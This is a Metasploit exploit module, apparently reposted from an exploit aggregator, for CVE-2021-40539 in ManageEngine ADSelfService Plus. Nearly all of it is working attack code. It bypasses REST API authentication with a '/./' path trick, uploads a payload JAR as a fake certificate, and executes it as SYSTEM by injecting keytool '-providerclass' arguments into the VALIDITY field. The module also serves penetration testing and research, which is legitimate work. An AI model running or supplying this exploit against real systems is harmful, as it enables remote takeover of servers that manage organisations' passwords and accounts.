Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539/
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',
        'Description' => %q{
          This module exploits CVE-2021-40539, a REST API authentication bypass
          vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and
          execute it as the user running ADSelfService Plus - which is SYSTEM if
          started as a service.
        },
        'Author' => [
          # Discovered by unknown threat actors
          'Antoine Cervoise', # Independent analysis and RCE
          'Wilfried Bécard', # Independent analysis and RCE
          'mr_me', # keytool classloading technique
          'wvu' # Initial analysis and module
        ],
        'References' => [
          ['CVE', '2021-40539'],
          ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],
          ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],
          ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],
          ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']
        ],
        'DisclosureDate' => '2021-09-07',
        'License' => MSF_LICENSE,
        'Platform' => 'java',
        'Arch' => ARCH_JAVA,
        'Privileged' => false, # true if ADSelfService Plus is run as a service
        'Targets' => [
          ['Java Dropper', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8888
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
      'vars_post' => {
        'methodToCall' => 'previewMobLogo'
      }
    )

    unless res
      return CheckCode::Unknown('Target failed to respond to check.')
    end

    unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\.jpeg})
      return CheckCode::Safe('Failed to bypass REST API authentication.')
    end

    CheckCode::Vulnerable('Successfully bypassed REST API authentication.')
  end

  def exploit
    upload_payload_jar
    execute_payload_jar
  end

  def upload_payload_jar
    print_status("Uploading payload JAR: #{jar_filename}")

    jar = payload.encoded_jar
    jar.add_file("#{class_name}.class", constructor_class) # Hack, tbh

    form = Rex::MIME::Message.new
    form.add_part('unspecified', nil, nil, 'form-data; name="methodToCall"')
    form.add_part('yas', nil, nil, 'form-data; name="Save"')
    form.add_part('smartcard', nil, nil, 'form-data; name="form"')
    form.add_part('Add', nil, nil, 'form-data; name="operation"')
    form.add_part(jar.pack, 'application/java-archive', 'binary',
                  %(form-data; name="CERTIFICATE_PATH"; filename="#{jar_filename}"))

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => form.to_s
    )

    unless res&.code == 404
      fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')
    end

    # C:\ManageEngine\ADSelfService Plus\bin (working directory)
    register_file_for_cleanup(jar_filename)

    print_good('Successfully uploaded payload JAR')
  end

  def execute_payload_jar
    print_status('Executing payload JAR')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),
      'vars_post' => {
        'methodToCall' => 'openSSLTool',
        'action' => 'generateCSR',
        # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html
        'VALIDITY' => "#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}"
      }
    )

    unless res&.code == 404
      fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')
    end

    print_good('Successfully executed payload JAR')
  end

  def jar_filename
    @jar_filename ||= "#{rand_text_alphanumeric(8..16)}.jar"
  end

end